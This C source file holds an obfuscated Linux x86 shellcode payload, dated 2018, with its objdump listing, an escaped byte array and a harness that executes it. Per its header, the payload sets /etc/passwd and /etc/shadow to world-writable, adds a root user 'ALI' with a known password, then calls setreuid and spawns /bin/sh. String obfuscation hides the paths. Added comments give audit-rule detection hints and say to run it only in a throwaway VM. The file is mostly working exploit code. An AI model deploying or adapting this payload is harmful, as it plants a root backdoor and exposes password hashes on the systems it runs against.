/*
#Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh
#length: 521 bytes
#Date: 8 September 2018
#Author: Ali Razmjoo
#tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
Ali Razmjoo , [email protected]
Thanks to Jonathan Salwan
chmod('/etc/passwd',777)
chmod('/etc/shadow',777)
open passwd , and write new root user with password ( user: ALI pass: ALI ) , close passwd
setreuid() , execve('/bin/sh')
root@user:~/Desktop/xpl# objdump -d f.o
f.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 31 d2 xor %edx,%edx
8: bb 59 45 4f 53 mov $0x534f4559,%ebx
d: ba 33 36 38 37 mov $0x37383633,%edx
12: 31 d3 xor %edx,%ebx
14: 53 push %ebx
15: c1 eb 08 shr $0x8,%ebx
18: 53 push %ebx
19: bb 7a 46 59 45 mov $0x4559467a,%ebx
1e: ba 55 36 38 36 mov $0x36383655,%edx
23: 31 d3 xor %edx,%ebx
25: 53 push %ebx
26: bb 67 58 45 4e mov $0x4e455867,%ebx
2b: ba 48 3d 31 2d mov $0x2d313d48,%edx
30: 31 d3 xor %edx,%ebx
32: 53 push %ebx
33: 89 e3 mov %esp,%ebx
35: 68 41 41 ff 01 push $0x1ff4141
3a: 59 pop %ecx
3b: c1 e9 08 shr $0x8,%ecx
3e: c1 e9 08 shr $0x8,%ecx
41: 6a 0f push $0xf
43: 58 pop %eax
44: cd 80 int $0x80
46: bb 53 49 57 4a mov $0x4a574953,%ebx
4b: ba 39 2d 38 3d mov $0x3d382d39,%edx
50: 31 d3 xor %edx,%ebx
52: c1 eb 08 shr $0x8,%ebx
55: 53 push %ebx
56: bb 6d 47 45 58 mov $0x5845476d,%ebx
5b: ba 42 34 2d 39 mov $0x392d3442,%edx
60: 31 d3 xor %edx,%ebx
62: 53 push %ebx
63: bb 6e 54 49 57 mov $0x5749546e,%ebx
68: ba 41 31 3d 34 mov $0x343d3141,%edx
6d: 31 d3 xor %edx,%ebx
6f: 53 push %ebx
70: 89 e3 mov %esp,%ebx
72: 68 41 41 ff 01 push $0x1ff4141
77: 59 pop %ecx
78: c1 e9 08 shr $0x8,%ecx
7b: c1 e9 08 shr $0x8,%ecx
7e: 6a 0f push $0xf
80: 58 pop %eax
81: cd 80 int $0x80
83: bb 73 47 4e 51 mov $0x514e4773,%ebx
88: ba 32 34 39 35 mov $0x35393432,%edx
8d: 31 d3 xor %edx,%ebx
8f: c1 eb 08 shr $0x8,%ebx
92: 53 push %ebx
93: bb 59 44 56 44 mov $0x44564459,%ebx
98: ba 76 34 37 37 mov $0x37373476,%edx
9d: 31 d3 xor %edx,%ebx
9f: 53 push %ebx
a0: bb 4e 58 59 51 mov $0x5159584e,%ebx
a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx
aa: 31 d3 xor %edx,%ebx
ac: 53 push %ebx
ad: 89 e3 mov %esp,%ebx
af: 68 41 41 01 04 push $0x4014141
b4: 59 pop %ecx
b5: c1 e9 08 shr $0x8,%ecx
b8: c1 e9 08 shr $0x8,%ecx
bb: 6a 05 push $0x5
bd: 58 pop %eax
be: cd 80 int $0x80
c0: 89 c3 mov %eax,%ebx
c2: 6a 04 push $0x4
c4: 58 pop %eax
c5: 68 41 73 68 0a push $0xa687341
ca: 59 pop %ecx
cb: c1 e9 08 shr $0x8,%ecx
ce: 51 push %ecx
cf: b9 57 67 57 58 mov $0x58576757,%ecx
d4: ba 39 48 35 39 mov $0x39354839,%edx
d9: 31 d1 xor %edx,%ecx
db: 51 push %ecx
dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx
e1: ba 74 4b 38 38 mov $0x38384b74,%edx
e6: 31 d1 xor %edx,%ecx
e8: 51 push %ecx
e9: b9 47 57 56 42 mov $0x42565747,%ecx
ee: ba 35 38 39 36 mov $0x36393835,%edx
f3: 31 d1 xor %edx,%ecx
f5: 51 push %ecx
f6: b9 61 70 51 4e mov $0x4e517061,%ecx
fb: ba 2d 39 6b 61 mov $0x616b392d,%edx
100: 31 d1 xor %edx,%ecx
102: 51 push %ecx
103: b9 48 58 70 74 mov $0x74705848,%ecx
108: ba 72 68 4a 35 mov $0x354a6872,%edx
10d: 31 d1 xor %edx,%ecx
10f: 51 push %ecx
110: b9 76 45 56 46 mov $0x46564576,%ecx
115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx
11a: 31 d1 xor %edx,%ecx
11c: 51 push %ecx
11d: 68 66 77 55 57 push $0x57557766
122: 68 68 70 31 50 push $0x50317068
127: 68 7a 59 65 41 push $0x4165597a
12c: 68 41 61 41 51 push $0x51416141
131: 68 49 38 75 74 push $0x74753849
136: 68 50 4d 59 68 push $0x68594d50
13b: 68 54 42 74 7a push $0x7a744254
140: 68 51 2f 38 54 push $0x54382f51
145: 68 45 36 6d 67 push $0x676d3645
14a: 68 76 50 2e 73 push $0x732e5076
14f: 68 4e 58 52 37 push $0x3752584e
154: 68 39 4b 55 48 push $0x48554b39
159: 68 72 2f 59 42 push $0x42592f72
15e: 68 56 78 4b 47 push $0x474b7856
163: 68 39 55 66 5a push $0x5a665539
168: 68 46 56 6a 68 push $0x686a5646
16d: 68 46 63 38 79 push $0x79386346
172: 68 70 59 6a 71 push $0x716a5970
177: 68 77 69 53 68 push $0x68536977
17c: 68 6e 54 67 54 push $0x5467546e
181: 68 58 4d 69 37 push $0x37694d58
186: 68 2f 41 6e 24 push $0x246e412f
18b: 68 70 55 6e 4d push $0x4d6e5570
190: 68 24 36 24 6a push $0x6a243624
195: b9 73 61 74 67 mov $0x67746173,%ecx
19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx
19f: 31 d1 xor %edx,%ecx
1a1: 51 push %ecx
1a2: 89 e1 mov %esp,%ecx
1a4: ba 41 41 41 7f mov $0x7f414141,%edx
1a9: c1 ea 08 shr $0x8,%edx
1ac: c1 ea 08 shr $0x8,%edx
1af: c1 ea 08 shr $0x8,%edx
1b2: cd 80 int $0x80
1b4: 31 c0 xor %eax,%eax
1b6: b0 46 mov $0x46,%al
1b8: 31 db xor %ebx,%ebx
1ba: 31 c9 xor %ecx,%ecx
1bc: cd 80 int $0x80
1be: 31 c0 xor %eax,%eax
1c0: b0 46 mov $0x46,%al
1c2: 31 db xor %ebx,%ebx
1c4: 31 c9 xor %ecx,%ecx
1c6: cd 80 int $0x80
1c8: 68 52 55 48 42 push $0x42485552
1cd: 68 52 51 49 43 push $0x43495152
1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx
1d7: ba 66 38 31 35 mov $0x35313866,%edx
1dc: 31 d1 xor %edx,%ecx
1de: 51 push %ecx
1df: b9 55 55 54 57 mov $0x57545555,%ecx
1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx
1e9: 31 d1 xor %edx,%ecx
1eb: 51 push %ecx
1ec: 89 e3 mov %esp,%ebx
1ee: 31 c0 xor %eax,%eax
1f0: 88 43 07 mov %al,0x7(%ebx)
1f3: 89 5b 08 mov %ebx,0x8(%ebx)
1f6: 89 43 0c mov %eax,0xc(%ebx)
1f9: b0 0b mov $0xb,%al
1fb: 8d 4b 08 lea 0x8(%ebx),%ecx
1fe: 8d 53 0c lea 0xc(%ebx),%edx
201: cd 80 int $0x80
203: b0 01 mov $0x1,%al
205: b3 01 mov $0x1,%bl
207: cd 80 int $0x80
root@user:~/Desktop/xpl#
*/
#include <stdio.h>
#include <string.h>
/*
 * Payload bytes: the machine code from the objdump listing in the file
 * header, written as \x escapes (the header gives the length as 521 bytes).
 *
 * Analyst notes, taken from that listing:
 *  - The path arguments and part of the line written to passwd are built at
 *    run time from pairs of 32-bit immediates (mov imm,%ebx or %ecx /
 *    mov imm,%edx / xor) and pushed onto the stack; the rest of the written
 *    line is pushed as literal immediates. The paths named in the header
 *    therefore do not appear as contiguous text in these bytes.
 *  - Syscalls are issued with int $0x80 and eax = 0x0f (twice), 0x05, 0x04,
 *    0x46 (twice), 0x0b and 0x01, i.e. chmod, open, write, setreuid, execve
 *    and exit on i386 Linux. Audit rules on mode changes and writes to
 *    /etc/passwd and /etc/shadow, and on new account entries, observe this
 *    behaviour independently of how the bytes are encoded.
 *  - NOTE(review): the header mentions closing passwd, but no close call
 *    (eax = 0x06) appears in the listing -- confirm against the original.
 */
char sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x8
8\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
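/*
 * Test harness for the payload in sc: prints its length, then transfers
 * control to the byte array by calling it through a function pointer.
 *
 * What happens after the call is the payload's behaviour, not this
 * program's. Per the file header it sets /etc/passwd and /etc/shadow to mode
 * 777, appends an account line to /etc/passwd, calls setreuid and execs
 * /bin/sh. It changes system account files on the machine it runs on, so the
 * harness is only meaningful inside a throwaway analysis VM.
 *
 * Returns 0 only if the call comes back; the listing ends in execve followed
 * by an exit syscall, so normally it does not.
 */
int main(void)
{
    /*
     * strlen() returns size_t, so the matching conversion is %zu; passing it
     * to %d is undefined behaviour. The value printed is the number of bytes
     * before the first zero byte in sc.
     */
    fprintf(stdout, "Length: %zu\n\n", strlen(sc));

    /* Treat the array as a function taking no arguments and call it. */
    (*(void (*)(void))sc)();

    return 0;
}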